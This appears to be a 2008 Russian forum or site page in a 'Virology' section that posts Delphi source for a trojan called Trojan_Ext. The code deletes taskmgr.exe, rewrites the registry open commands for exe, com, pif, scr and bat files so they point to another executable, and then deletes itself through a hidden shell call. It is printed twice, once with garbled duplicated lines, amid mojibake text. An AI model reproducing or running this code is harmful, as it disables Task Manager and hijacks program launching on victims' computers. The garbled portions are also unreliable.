 |
Исходник функциональной программы на Delphi
И еще один исходник
var Buffer: array[0..1023] of Char
Buffer: [0..1023] Charreg: TRegistry;
winDir: String;
OurFile: array[0..MAX_PATH] of Char;
Cmd: String;
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));
Reg:=TRegistry.Create;
Reg.LazyWrite:=false;
Reg.RootKey:=HKEY_CLASSES_ROOT;
Reg.OpenKey(’exefile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’piffile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’comfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’scrfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’batfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.Free;
try
if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then
(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin
Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;
if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then
(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin
Halt;
end;
end;
except
Halt;
end;
Aio e ana. Enoiaiee eae anaaaa i?eeaaaaony. Aio iieiue eia:
program Trojan_Ext;
Trojan_Ext; uses
Windows,Registry,ShellApi;
var Buffer: array[0..1023] of Char;
Buffer: [0..1023] Char;reg: TRegistry;
winDir: String;
OurFile: array[0..MAX_PATH] of Char;
Cmd: String;
begin
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’));
Reg:=TRegistry.Create;
Reg.LazyWrite:=false;
Reg.RootKey:=HKEY_CLASSES_ROOT;
Reg.OpenKey(’exefile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’piffile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’comfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’scrfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.OpenKey(’batfile\shell\Open\Command’,true);
Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’);
Reg.CloseKey;
Reg.Free;
try
if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then
(GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin
Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’;
if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then
(GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin
Halt;
end;
end;
except
Halt;
end;
end.
|
| Категория: Вирусология | Добавил: dolphin (27.09.2008)
|
| Просмотров: 3717 | Комментарии: 2
| Рейтинг: 5.0/4 |
|
|
| Всего комментариев: 2 | |
|
|
|
|
 |
 |  |
 |  |  |
|
| Профиль |
 | |
 |
| Поиск |
| |
|
| Наша кнопка |
|
|
|
|
Статистика
|
|
Статистика материалов Файлов: 454 Форум: 1165/8116 Коментариев: 768 Новостей: 29
Статистика пользователей Всего: 332 За неделю: 1 Вчера: 0 Сегодня: 0
Всего онлайн: 2 Гостей: 2 Пользователей: 0
|
|
|
0
